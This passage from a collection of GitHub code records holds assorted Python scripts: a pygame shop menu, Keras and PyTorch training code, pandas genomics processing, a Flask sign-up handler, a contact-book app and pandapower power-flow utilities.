requests.get(url, headers=headers)\n response.raise_for_status()\n reviews = self.__objectifyReviewList(response.json()[\"reviews\"])\n except Exception as e:\n self.__LOGGER.error(e)\n return reviews\n","repo_name":"joeyagreco/random-yelp-reviews","sub_path":"server/client/YelpApiClient.py","file_name":"YelpApiClient.py","file_ext":"py","file_size_in_byte":5619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69904123689","text":"import pickle\nfrom src.models.song_note_range_tracker import SongNoteRangeTracker\nfrom src.models.voices import voices\n\n\nwith open('./data/jsb-chorales-16th.pkl', 'rb') as file:\n dataset = pickle.load(file, encoding=\"latin1\")\n\nlowest_note = 127\nhighest_note = 0\n\nvoice_ranges = {\n 'soprano': {'lowest_note': 127, 'highest_note': 0},\n 'alto': {'lowest_note': 127, 'highest_note': 0},\n 'tenor': {'lowest_note': 127, 'highest_note': 0},\n 'bass': {'lowest_note': 127, 'highest_note': 0}\n}\n\nfor song in (dataset['train'] + dataset['test'] + dataset['valid']):\n for song_segment in song:\n if len(song_segment) == 0:\n continue\n\n highest_note = int(max(highest_note, max(song_segment)))\n lowest_note = int(min(lowest_note, min(song_segment)))\n\n for voice_name in voice_ranges.keys():\n voice = voices[voice_name]\n note_range_tracker = SongNoteRangeTracker(voice)\n\n for song_segment in song:\n voice_note = note_range_tracker.get_next_note(song_segment)\n\n if voice_note == -1:\n continue\n\n voice_lowest_note = voice_ranges[voice_name]['lowest_note']\n voice_ranges[voice_name]['lowest_note'] = min(voice_lowest_note, voice_note)\n\n voice_highest_note = voice_ranges[voice_name]['highest_note']\n voice_ranges[voice_name]['highest_note'] = max(voice_highest_note, voice_note)\n \n\n\n\n\nprint(f'Global lowest note: {lowest_note}')\nprint(f'Global highest note: {highest_note}')\n\n\nfor voice_name, range in voice_ranges.items():\n print(f\"{voice_name} lowest note: {range['lowest_note']}\")\n print(f\"{voice_name} highest note: {range['highest_note']}\")\n","repo_name":"arsenaultk9/pytorch-mini-bach-nn-counterpoint","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5484179639","text":"import pygame\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (186, 0, 0)\nYELLOW = (234, 150, 0)\nGREEN = (0, 104, 56)\nBLUE = (0, 89, 219)\nHOVER_ITEM_COLOR = (240, 240, 240)\n\nWIN_WIDTH = 800\nWIN_HEIGHT = 640\nHALF_WIDTH = int(WIN_WIDTH / 2)\nHEADER_HEIGHT = int(WIN_HEIGHT / 6)\nDISPLAY = (WIN_WIDTH, WIN_HEIGHT)\n\n#constants representing different items\nEXTINGUISHER = 0;\nBOOTS = 1;\nAID = 2;\n\nCANCEL = 3;\nCHECKOUT = 4;\n\nselectedCheckout = pygame.image.load('images/selected_checkout.png')\nselectedClose = pygame.image.load('images/selected_close.png')\n\nallItems = {\n EXTINGUISHER: pygame.image.load('images/extinguisher.png'),\n BOOTS: pygame.image.load('images/boots.png'),\n AID: pygame.image.load('images/first_aid.png'),\n\n CANCEL: pygame.image.load('images/close_button.png'),\n CHECKOUT: pygame.image.load('images/checkout.png'),\n}\n\ninfo = {\n EXTINGUISHER: \"Fire Extinguisher ($50): Used to put out any fire.\",\n BOOTS: \"Boots ($90): Help prevent electrocution.\",\n AID: \"First Aid ($30): Restores some health to the player.\",\n}\n\nprices = {\n EXTINGUISHER: 50,\n BOOTS: 90,\n AID: 30\n}\nselectedItemNr = EXTINGUISHER\nstoreMoney = 0\n\nfor item in prices:\n storeMoney += prices[item]\n\ncartTotal = 0\nyourMoney = 0\nposition = -1\nwidth, height = 6, 2\nlayout = []\n\nlayout.append([EXTINGUISHER, BOOTS, AID, -1, -1, -1]) #left three spaces for store, right 3 for inventory\nlayout.append([CANCEL, CANCEL, CANCEL, CHECKOUT, CHECKOUT, CHECKOUT])\n\ndone = False\nitemsBought = {}\n\ntooExpensive = False\nnothingToPurchase = False\n\ndef giveMoney(money):\n global yourMoney\n yourMoney += money\n\ndef openMenu():\n global done\n global cartTotal\n global tooExpensive\n cartTotal = 0\n startingLayout = [row[:] for row in layout]\n\n done = False\n\n def display_item_info(screen, itemNr):\n infoFont = pygame.font.Font(None, 20)\n infoText = infoFont.render(info[itemNr], 1, WHITE)\n pygame.draw.rect(screen, BLACK, [2, WIN_HEIGHT-60, 363, 60])\n screen.blit(infoText, (10, WIN_HEIGHT-40))\n\n\n def draw_table_structure(screen):\n # top parts\n pygame.draw.rect(screen, WHITE, [2, 2, HALF_WIDTH - 4, HEADER_HEIGHT])\n pygame.draw.rect(screen, WHITE, [HALF_WIDTH, 2, HALF_WIDTH - 2, HEADER_HEIGHT])\n\n # green parts\n pygame.draw.rect(screen, GREEN, [HALF_WIDTH/4, 2*HEADER_HEIGHT/3+3, HALF_WIDTH/2, HEADER_HEIGHT/3])\n pygame.draw.rect(screen, GREEN, [HALF_WIDTH + HALF_WIDTH/4, 2*HEADER_HEIGHT/3+3, HALF_WIDTH/2, HEADER_HEIGHT/3])\n\n # main parts\n storeRect = pygame.draw.rect(screen, WHITE, [2, HEADER_HEIGHT+4, HALF_WIDTH-4, WIN_HEIGHT-HEADER_HEIGHT-6])\n pygame.draw.rect(screen, WHITE, [HALF_WIDTH, HEADER_HEIGHT+4, HALF_WIDTH-2, WIN_HEIGHT-HEADER_HEIGHT-6])\n\n #close button\n screen.blit(allItems[CANCEL], (HALF_WIDTH-35, WIN_HEIGHT-72))\n\n #checkout button\n screen.blit(allItems[CHECKOUT], (WIN_WIDTH - 147, WIN_HEIGHT - 82))\n\n def draw_store_items(screen, selected_item):\n itemNumber = 0\n leftShift = 0\n\n for y in range(0, 6):\n if layout[0][y] != -1:\n itemNumber = layout[0][y]\n if y>2:\n leftShift = 14\n if selected_item == allItems[itemNumber]:\n pygame.draw.rect(screen, HOVER_ITEM_COLOR, [8+y*128+leftShift, HEADER_HEIGHT + 48, 130, 130])\n\n screen.blit(allItems[itemNumber], (18 + 128 * y + leftShift, HEADER_HEIGHT + 52))\n\n def navigate_menu(key):\n global done\n global selectedItemNr\n global allItems\n global itemsBought\n global layout\n global position\n global yourMoney\n global tooExpensive\n global nothingToPurchase\n\n tooExpensive = False\n nothingToPurchase = False\n if position == -1:\n position = selectedItemNr%3\n x = position\n y = selectedItemNr//3\n\n # Find the chosen item\n if key == pygame.K_a:\n if y == 1:\n selectedItemNr = CANCEL\n else:\n if x - 1 < 0:\n x = 6\n while (layout[0][x-1] == -1):\n if x-2 < 0:\n x = 5\n else:\n x -= 1\n selectedItemNr = layout[0][x-1]\n position = x-1\n\n elif key == pygame.K_d:\n if y == 1:\n selectedItemNr = CHECKOUT\n else:\n if x + 1 > 5:\n x = -1\n while (layout[0][x+1] == -1):\n if x+2 > 5:\n x = -1\n else:\n x += 1\n selectedItemNr = layout[0][x+1]\n position = x+1\n\n elif key == pygame.K_RETURN:\n if selectedItemNr < CANCEL:\n switch_side(selectedItemNr)\n elif selectedItemNr == CANCEL:\n selectedItemNr = EXTINGUISHER\n layout = [row[:] for row in startingLayout]\n done = True\n elif selectedItemNr == CHECKOUT:\n if cartTotal == 0:\n nothingToPurchase = True\n elif cartTotal <= yourMoney:\n yourMoney = yourMoney - cartTotal\n\n selectedItemNr = EXTINGUISHER\n done = True\n for x in range(3, 6):\n itemNum = layout[0][x]\n if itemNum!=-1 and itemNum < CANCEL:\n itemsBought[itemNum] = allItems[itemNum]\n del prices[itemNum]\n layout[0][x] = -1\n else:\n tooExpensive = True\n\n elif key == pygame.K_s:\n if x<3:\n selectedItemNr = CANCEL\n else:\n selectedItemNr = CHECKOUT\n\n elif key == pygame.K_w:\n selectedItemNr = 0\n\n def switch_side(selectedItemNr):\n global position\n global storeMoney\n global cartTotal\n layout[0][position]=-1\n i=0\n\n if position < 3:\n i=3\n\n while (layout[0][i] != -1):\n i+=1\n\n for y in range(0, 6):\n if layout[0][y] == selectedItemNr:\n layout[0][y] = -1\n\n layout[0][i] = selectedItemNr\n\n position = i\n if i>2:\n storeMoney = storeMoney - prices[selectedItemNr]\n cartTotal = cartTotal + prices[selectedItemNr]\n else:\n storeMoney = storeMoney + prices[selectedItemNr]\n cartTotal = cartTotal - prices[selectedItemNr]\n\n storeMoneyText = moneyFont.render(\"$\" + str(storeMoney), 1, WHITE)\n yourMoneyText = moneyFont.render(\"$\" + str(cartTotal), 1, WHITE)\n\n\n\n\n pygame.init()\n pygame.font.init()\n size = (WIN_WIDTH, WIN_HEIGHT)\n screen = pygame.display.set_mode(size)\n\n headerFont = pygame.font.Font(None, 68)\n moneyFont = pygame.font.Font(None, 42)\n storeItemsText = headerFont.render(\"Store Items\", 1, YELLOW)\n yourItemsText = headerFont.render(\"Items to Buy\", 1, BLUE)\n\n clock = pygame.time.Clock()\n\n # -------- Main Program Loop -----------\n while not done:\n # --- Event Processing\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n if event.type == pygame.KEYDOWN:\n navigate_menu(event.key)\n\n if not done:\n screen.fill(BLACK)\n\n draw_table_structure(screen)\n draw_store_items(screen, allItems[selectedItemNr])\n if selectedItemNr < 3:\n display_item_info(screen, selectedItemNr)\n elif selectedItemNr == CANCEL:\n screen.blit(selectedClose, (HALF_WIDTH - 35, WIN_HEIGHT - 72))\n elif selectedItemNr == CHECKOUT:\n screen.blit(selectedCheckout, (WIN_WIDTH - 147, WIN_HEIGHT - 82))\n\n screen.blit(storeItemsText, (HALF_WIDTH/6+5, HEADER_HEIGHT/6))\n screen.blit(yourItemsText, (HALF_WIDTH+HALF_WIDTH/6 -5, HEADER_HEIGHT/6))\n\n storeMoneyText = moneyFont.render(\"$\" + str(storeMoney), 1, WHITE)\n cartMoneyText = moneyFont.render(\"$\" + str(cartTotal), 1, WHITE)\n yourMoneyText = moneyFont.render(\"Have: $\" + str(yourMoney), 1, YELLOW)\n screen.blit(storeMoneyText, (HALF_WIDTH/2 - 30, 2*HEADER_HEIGHT/3+6))\n screen.blit(cartMoneyText, (HALF_WIDTH + HALF_WIDTH/2 - 25, 2*HEADER_HEIGHT/3 + 6))\n screen.blit(yourMoneyText, (HALF_WIDTH + 65, WIN_HEIGHT-55))\n if tooExpensive == True:\n screen.blit(moneyFont.render(\"You don't have enough money!\", 1, RED), (HALF_WIDTH - 165, WIN_HEIGHT / 2))\n elif nothingToPurchase == True:\n screen.blit(moneyFont.render(\"Nothing selected to purchase!\", 1, RED), (HALF_WIDTH - 180, WIN_HEIGHT / 2))\n\n pygame.display.flip()\n\n clock.tick(12)\n\n return itemsBought","repo_name":"Syihan/randi-game","sub_path":"StoreMenu.py","file_name":"StoreMenu.py","file_ext":"py","file_size_in_byte":9071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12865779051","text":"import os\nimport sys\nimport glob\nimport pandas as pd\n\n\nos.chdir(\"\")\n\nallfiles = glob.glob('*.csv')\n\n#loop through all files\nfor file in allfiles :\n df = pd.read_csv(file,sep=\",\")\n df = df.set_index(\"Unnamed: 0\")\n \n #Split Peaks into Proximal promoter and Distal \n nan_df = df[df['Distance.to.TSS'].isnull()]\n df = df.dropna(subset=['Distance.to.TSS'])\n TSS_peak = df[df[\"Distance.to.TSS\"].between(-2000,2000,inclusive=True)]\n Distal_peak = df.drop(TSS_peak.index,axis=0)\n #TSS_peak.to_csv('92_TSSpeaks.csv',sep=\",\")\n #Distal_peak.to_csv('92_Distalpeaks.csv',sep=\",\")\n #creation of Bedfiles for HOMER\n #filter for DE Genes\n\n #Save Peaks into two different CSV files\n de_tss = TSS_peak[TSS_peak.Expression != 'Nc']\n de_tss.to_csv(file + '_detss.csv',sep=\",\")\n de_distal = Distal_peak[Distal_peak.Expression != 'Nc']\n de_distal.to_csv(file +'_dedistal.csv',sep=\",\")\n\n #Edit peaks to contain columns needed for HOMER program on BlueBear. \n homebedfile_TSS = de_tss[['Chr','Start','End']]\n homebedfile_Distal = de_distal[['Chr','Start','End']]\n homebedfile_TSS.to_csv(file + 'tssmotif.csv',sep=\",\",index=False, header=False)\n homebedfile_Distal.to_csv(file + 'distalmofit.csv',sep=\",\",index=False, header = False)\n","repo_name":"drb902/Module7","sub_path":"DNaseI_Distal_promoter_split.py","file_name":"DNaseI_Distal_promoter_split.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13155911649","text":"import json\n\nimport torch\n\n\nclass LSDLoader(torch.utils.data.Dataset):\n def __init__(self, path, num_images=-1):\n self.target_path = path + \"/targets/\"\n self.input_path = path + \"/inputs/\"\n self.file_dir = path + \"/correspondence.txt\"\n self.add_to_output_path = '/media/student/2.0 TB Hard Disk/add_to_output/'\n self.data = []\n\n with open(self.file_dir, 'r') as file:\n contents = file.read().replace(\"\\'\", \"\\\"\")\n parsed_json = json.loads(contents)\n\n for key, elements in parsed_json.items():\n if type(elements) is list:\n for element in elements:\n self.data.append((element, key))\n else:\n self.data.append((elements, key))\n if num_images > 0:\n self.data = self.data[::600 // num_images]\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n img_name = self.input_path + self.data[idx][0]\n label_name = self.target_path + self.data[idx][1]\n add_name = self.add_to_output_path + self.data[idx][0]\n image = torch.load(img_name).squeeze()\n target = torch.load(label_name).squeeze()\n add = torch.load(add_name).squeeze()\n\n return image, target, add\n","repo_name":"Filip54242/Learning-to-see-in-the-dark-CNN","sub_path":"MyCode/LSDLoader_noise_test.py","file_name":"LSDLoader_noise_test.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74412999848","text":"import tensorflow as tf\nfrom keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(rescale = 1./255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True)\n\ntraining_set = train_datagen.flow_from_directory('../DB/cat_dog/train',\n target_size = (64, 64),\n batch_size = 32,\n class_mode = 'binary')\n\nprint('class info:',training_set.class_indices)\n\nval_datagen = ImageDataGenerator(rescale = 1./255)\nval_set = val_datagen.flow_from_directory('../DB/cat_dog/val',\n target_size = (64, 64),\n batch_size = 32,\n class_mode = 'binary')\n\nif 1:\n cnn = tf.keras.models.Sequential()\n cnn.add(tf.keras.layers.Conv2D(filters=32, kernel_size=3, activation='relu', input_shape=[64, 64, 3]))\n cnn.add(tf.keras.layers.MaxPool2D(pool_size=2, strides=2))\n cnn.add(tf.keras.layers.Conv2D(filters=32, kernel_size=3, activation='relu'))\n cnn.add(tf.keras.layers.MaxPool2D(pool_size=2, strides=2))\n cnn.add(tf.keras.layers.Flatten())\n cnn.add(tf.keras.layers.Dense(units=128, activation='relu'))\n cnn.add(tf.keras.layers.Dense(units=1, activation='sigmoid'))\nelse:\n cnn = tf.keras.models.load_model('model.h5')\n\ncnn.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\n\ncnn.fit(training_set, validation_data = val_set, epochs = 50)\n\ncnn.save('model.h5')\n","repo_name":"jerinka/DeepLearning_Tensorflow_Pytorch_Tutorial","sub_path":"tf_flow_from_directory/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38284955569","text":"__author__ = 'nherbaut'\nfrom flask import g\nfrom flask import render_template\nfrom flask import session\nfrom flask import abort\n\nfrom service.repo import get_repos_for_user\n\nfrom models import User\nfrom database import db_session\nfrom settings import git_microservice_url\n\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = connect_to_database()\n return db\n\n\ndef do_sign_up_or_in(username='', password=''):\n return render_template('signup.html',\n github_signup=git_microservice_url + \"github/auth\")\n\n\ndef do_sign_up_github(user_name='', user_id=''):\n return render_template('signup.html', user_name=user_name, user_id=user_id, github=True)\n\n\ndef do_sign_up_final(user_name, user_email, user_id):\n session['user_id'] = user_id\n u = User.query.filter_by(id=user_id).first()\n if u is None:\n u = User(user_id, user_name, user_email)\n db_session.add(u)\n db_session.commit()\n return render_template('main.html', user_id=u.id, repos=get_repos_for_user(user_id))\n return abort(404)","repo_name":"nherbaut/openLatexFactory","sub_path":"frontend/service/registration.py","file_name":"registration.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32610556551","text":"\"\"\"\n AGENDA 11 PRO\n -------------\n v1.0 (datos en memoria)\n v2.0 (datos en disco)\n\"\"\"\nimport os\n\n# * *****************************\n# * ******* CLASES\n# * *****************************\n\n\nclass Ficha:\n def __init__(self, name, phone, email):\n self.name = name\n self.phone = phone\n self.email = email\n\n\nclass Agenda:\n # *constructor\n def __init__(self):\n self._contactos = []\n\n # *métodos\n # añadir contacto\n def nuevo(self, name, phone, email):\n # el nuevo objeto contacto\n contacto = Ficha(name, phone, email)\n # añadir introducción de datos del usuario a la lista\n self._contactos.append(contacto)\n print(\"\"\"\n Contacto añadido correctamente\n \"\"\")\n\n # mostrar todos los contactos\n def mostrar_todo(self):\n for contacto in self._contactos:\n # como imprimir los contactos en pantalla\n self._mostrar(contacto)\n\n def _mostrar(self, contacto):\n print('--- * ----' * 10)\n print('Nombre: {}'.format(contacto.name))\n print('Teléfono: {}'.format(contacto.phone))\n print(f'Email: {contacto.email}')\n print('--- * ----' * 10)\n\n def borrar(self, name):\n for idx, contacto in enumerate(self._contactos):\n if contacto.name.lower() == name.lower():\n del self._contactos[idx]\n break\n\n def buscar(self, name):\n for contacto in self._contactos:\n if contacto.name.lower() == name.lower():\n self._mostrar(contacto)\n break\n else:\n self._no_encontrado()\n\n # Actualizar contacto\n\n def actualizar(self, name, phone, email):\n for contacto in self._contactos:\n if contacto.name.lower() == name.lower():\n contacto.phone = phone\n contacto.email = email\n break\n else:\n self._no_encontrado()\n\n print(\"\"\"\n Actualización correcta\n \"\"\")\n\n def _no_encontrado(self):\n print('*' * 30)\n print('¡NO encontrado!')\n print('*' * 30)\n\n# * *****************************\n# * ******* FUNCIONES\n# * *****************************\n\n\ndef run():\n # limpiar terminal\n os.system('clear')\n # crear objeto\n agenda_de_toni = Agenda()\n # bucle infinito\n while True:\n # menu para el usuario\n print(f'B I E N V E N I D O A LA A G E N D A DE T O N I')\n menu = input(\"\"\"\n\n ¿Qué quieres hacer ahora?\n\n [a]ñadir contacto\n [ac]tualizar contacto\n [b]uscar contacto\n [e]liminar contacto\n [l]istar contactos\n [s]alir\n\n \"\"\")\n\n # Si el usuario pulsa la a de Añadir contacto\n if menu.lower() == 'a':\n # Se le piden los datos necesarios al usuario\n nombre = input('Escribe el nombre de contacto: ')\n telefono = input('Escribe el telelfono de contacto: ')\n email = input('Escribe el email de contacto: ')\n # Se llama al método de añadir contacto\n agenda_de_toni.nuevo(nombre, telefono, email)\n\n # Si el usuario pulsa la ac de Actualizar contacto\n if menu.lower() == 'ac':\n # Se le piden los datos necesarios al usuario\n nombre = input('Escribe el nombre de contacto: ')\n telefono = input('Escribe el telelfono de contacto: ')\n email = input('Escribe el email de contacto: ')\n # Se llama al método de añadir contacto\n agenda_de_toni.actualizar(nombre, telefono, email)\n\n # Si el usuario pulsa la b de buscar contacto\n elif menu.lower() == 'b':\n nombre = input('Escribe el nombre de contacto: ')\n\n # Se llama al método de buscar contacto\n agenda_de_toni.buscar(nombre)\n\n # Si el usuario pulsa la e de borrar contacto\n elif menu.lower() == 'e':\n nombre = input('Escribe el nombre de contacto: ')\n\n # Se llama al método de buscar contacto\n agenda_de_toni.borrar(nombre)\n\n # Si el usuario pulsa la l de Añadir contacto\n elif menu.lower() == 'l':\n # Se llama al método de mostrar todos los contacto\n agenda_de_toni.mostrar_todo()\n\n # Si el usuario pulsa la s de salir de la app\n elif menu.lower() == 's':\n break\n # el usuario a introducido una opción que no existe\n else:\n print('Comando no encontrado. Vuelva a intentarlo')\n\n\n# * *****************************\n# * ******* INICIO DE SCRIPT\n# * *****************************\nif __name__ == \"__main__\":\n run()\n","repo_name":"ibecon2019profetoni/entorno_virtual_Python37","sub_path":"apps/agenda.py","file_name":"agenda.py","file_ext":"py","file_size_in_byte":4756,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"546832552","text":"import random\r\nfrom bert_serving.client import BertClient\r\nimport torch\r\n\r\ndef gen_random_sample(data, encoder):\r\n idx = random.randint(0,len(data)-1)\r\n start_emb = torch.from_numpy(encoder.encode(data[idx]['sent1']))\r\n cand0_emb = torch.from_numpy(encoder.encode(data[idx]['cand0']))\r\n cand1_emb = torch.from_numpy(encoder.encode(data[idx]['cand1']))\r\n cand2_emb = torch.from_numpy(encoder.encode(data[idx]['cand2']))\r\n cand3_emb = torch.from_numpy(encoder.encode(data[idx]['cand3']))\r\n label_tensor = torch.from_numpy(int(data[idx]['label']))\r\n\r\n return start_emb, cand0_emb, cand1_emb, cand2_emb, cand3_emb,label_tensor\r\n\r\ndef gen_random_batch(data, encoder, batch_size = 32):\r\n\r\n starts,cand0s,cand1s,cand2s,cand3s, labels = gen_random_sample(data, encoder)\r\n for i in range(batch_size-1):\r\n start_emb, cand0_emb, cand1_emb, cand2_emb, cand3_emb, label_tensor = gen_random_sample(data, encoder)\r\n starts = torch.cat((starts,start_emb),0)\r\n cand0s = torch.cat((cand0s, cand0_emb),0)\r\n cand1s = torch.cat((cand1s, cand1_emb), 0)\r\n cand2s = torch.cat((cand2s, cand2_emb), 0)\r\n cand3s = torch.cat((cand3s, cand3_emb), 0)\r\n labels = torch.cat((labels, label_tensor),0)\r\n\r\n return starts,cand0s,cand1s,cand2s,cand3s, labels\r\n\r\n\r\n","repo_name":"XenonLamb/CIS530_FP","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"33673238468","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 1 21:48:05 2018\n\n@author: lenovo\n\"\"\"\n\nfrom sys import argv\nfrom os.path import exists\n\nscript, from_file, to_file=argv\n\nprint(f\"Doe's input file exists {exists(from_file)}\")\nprint(f\"Coping from input file {from_file} to ouput file {to_file}\")\n\nin_file=open(from_file)\nindata=in_file.read()\n\nprint(f\"Is output file exists? {exists(to_file)}\")\ninput()\nout_file=open(to_file,'w')\nout_file.write(indata)\n\nfrom_file.close()\nto_file.close()\n","repo_name":"akashbhanu009/Programs","sub_path":"copy1.py","file_name":"copy1.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9498447873","text":"# List of function used in my code\n\nimport pandapower, pandas, numpy\nfrom tqdm import tqdm # Profiling\n\npd = pandas\nnp = numpy \npp = pandapower\n############################### Variables #########################################\n\n# Create an attribute list to use in functions\nattr_list = [('bus', 'name'),\n ('load', 'bus'),\n ('switch', 'bus'),\n ('line', 'from_bus'),\n ('line', 'to_bus'),\n ('trafo', 'hv_bus'),\n ('trafo', 'lv_bus')]\n\n# Set Define set of folders\nnetwork_folder = 'pickle_files/'\nexcel_folder = 'excel_files/'\npy_folder = 'py_files/'\n\nΔt = 1 / 6 # Time frequency 10mn ==> 1Hour/6\n\ntrain_split_date = '2021 12 31 23:50' # Date of training+Validation split data Lower bond \ntrainVal_split_date = '2021 06 01' # lower date to split training and validation data\n\n############################## FUNCTIONS #########################################\n\ndef readAndReshape_input(f_name, folder_name=excel_folder, n_row2read=None):\n \"\"\"\nRead and reshape in a one dimension list the file given by the input \n\n\nParameters: \n-----------\n'f_name': String\n Name of the file to load (with the correct extension)\n n_row2_skip : Int (default=0) \n Numbers of rows to skip from the starting of the read file.\nOutput:\n-------\n Data of the input file reshaped in a unique list\n\n \"\"\"\n\n filename = f\"{folder_name}{f_name}\"\n cols_to_read = range(2, 8) # Define index of columns to read\n input_data = pandas.read_csv(filename,\n header=None,\n sep=\";\",\n usecols=cols_to_read,\n nrows=n_row2read)\n\n return numpy.array(input_data).reshape(-1) / 1000 # /1000 To convert data in mW\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________\n\ndef check_bus_connection(network, bus_number, attr_list):\n \"\"\"\nCheck and print the connection between a bus number and all the elements in the network.\n\nParameters:\n----------\nnetwork: pandapower network\n The network that has to be investigated\nbus_number: list of int\n The number of the concerned bus(ses)\nattr_list: list of String tuple\n Each tuple in the list represent the attribute of the attribute to look for\n Ex: attr_list[0] = ('bus', 'name') ==> network.bus.name must be accessed\n \n \"\"\"\n\n for cur_bus in bus_number: # For each bus\n for attribute in attr_list: # For each tuple in the attibute list\n netsub = getattr(network, attribute[0])\n netsub_sub = getattr(netsub, attribute[1])\n\n if len(netsub[netsub_sub == cur_bus]) != 0: # If there is some elements\n print(\n f'----------****** Bus {cur_bus} net.{attribute[0]}.{attribute[1]} ******-------')\n print(netsub[netsub_sub == cur_bus], '\\n')\n print('\\n')\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________\n\ndef initialize_network_at(network: pandapower.auxiliary.pandapowerNet,\n curr_period: pandas._libs.tslibs.period,\n sum_max_main_network: tuple,\n dict_df_sgenLoad: dict):\n \"\"\"\nReturn a fixed float;\n\nInitialise the parameters of the network at the current period\n\nParameters:\n----------\nnetwork: Pandapower network\n The small network concerned ;\ncurr_period: Pandas period\n The current period to investigate;\nsum_max_main_network: tuple\n Sum of maximum power seen from the bigger network (here, saint laurent \n compared to the subnetwork civaux)\n + Of all BT energy producers => sum_max_input[0]\n + of all Load in the network => sum_max_input[1] \ndict_df_sgenLoad: dict \n Dictionary containing data (as dataframe i.e indexed by each period of \n the considered year) of the \n + df_prodHT => HT producers in the subnetwork \n + df_prod_bt_total => BT producers in the subnetwork\n + df_cons_total => Load demand subnetwork \n \n\n \"\"\"\n ## TODO : Give only the data of the current period to\n ## the function instead of that of the whole year\n\n # Initiate parameters to be used within funtion\n sum_max_p_mw_StLaurent_prodBT = sum_max_main_network[0]\n sum_max_p_mw_StLaurent_load = sum_max_main_network[1]\n\n df_prodHT = dict_df_sgenLoad['df_prodHT']\n df_prod_bt_total = dict_df_sgenLoad['df_prod_bt_total']\n df_cons_total = dict_df_sgenLoad['df_cons_total']\n\n # Initalise HT producers \n network.sgen.p_mw[network.sgen.name.notna()] = df_prodHT.loc[curr_period].values\n\n # Initialize Bt producers\n network.sgen.p_mw[network.sgen.name.isna()] = (network.sgen.\n max_p_mw[network.sgen.name.isna()] *\n df_prod_bt_total.loc[curr_period].\n values / sum_max_p_mw_StLaurent_prodBT)\n # Initialize Loads\n network.load.p_mw = (network.load.max_p_mw * df_cons_total.loc[curr_period].\n values / sum_max_p_mw_StLaurent_load)\n\n # Work with julia Power model since the load is zero\n # network.load.p_mw = (network.load.max_p_mw*df_cons_total.loc[curr_period].\n # values*0/sum_max_p_mw_StLaurent_load)\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________\n\ndef max_vm_pu_at(network: pandapower.auxiliary.pandapowerNet,\n curr_period: pandas._libs.tslibs.period,\n net_hv_activated_bus: list,\n dict_df_sgenLoad: dict,\n opf_status=False):\n \"\"\"\nReturn a fixed float;\n\nReturn the maximum voltage over all the bus in the network for the current period.\n\nParameters:\n----------\nnetwork: Pandapower network\n The network ;\ncurr_period: Panda period\n The current period to investigate;\nnet_hv_activated_bus: List\n List of all the higher voltage activated bus in the network\ndict_df_sgenLoad: dict \n Dictionary containing data (as dataframe i.e indexed by each period of \n the considered year) of the \n + df_prodHT => HT producers in the subnetwork \n + df_prod_bt_total => BT producers in the subnetwork\n + df_cons_total => Load demand subnetwork \nofp_status: Boolean = False\n Wether the maximum voltage is computed after a normal or optimal power flow or both\n + Normal => **pandapower.runpp(net)**, ofp_status = False\n + Optimal => **pandapower.runopp(net)**, ofp_status = True\n \n \n \"\"\"\n\n # Initiate parameters from input\n df_prodHT = dict_df_sgenLoad['df_prodHT']\n\n if opf_status: # If status is true\n # update \n # For optimal flow, given that the sgen P0100 is contollable the optimization \n # result is to draw the maximum power with no regard to the actual power provided \n # at each instant. To eliavate this problem we would rather initialize the maximum \n # power of the said producer with the actual prooduction. \n network.sgen.at[23, 'max_p_mw'] = df_prodHT['P0100'][curr_period] # TODO give as\n # argument the index of the line (23) where the considered\n # energy producer is located\n pandapower.runopp(network) # Run network\n # pandapower.runpm_ac_opf(network) # Run network with Julia Power model:\n # Not converging for the moment, but Do converge when le load demand is low\n\n else:\n pandapower.runpp(network) # Run network\n # pandapower.runpm_pf(network) # Run network with Julia Power model:\n # Not converging for the moment, but Do converge when le load demand is low\n\n # Return the maximum voltage over all the busses in the network for the current instant\n return network.res_bus.loc[net_hv_activated_bus, 'vm_pu'].max()\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________\n\ndef run_powerflow(network: pandapower.auxiliary.pandapowerNet,\n network_hv_activated_bus: list,\n sum_max_main_network: tuple,\n dict_df_sgenLoad: dict,\n opf_status=False):\n \"\"\"\nReturn a list of maximum voltage on the network for each period given by the index \nof element in \n\nInitialise the parameters of the network\n\nParameters:\n----------\nnetwork: Pandapower network\n The network to 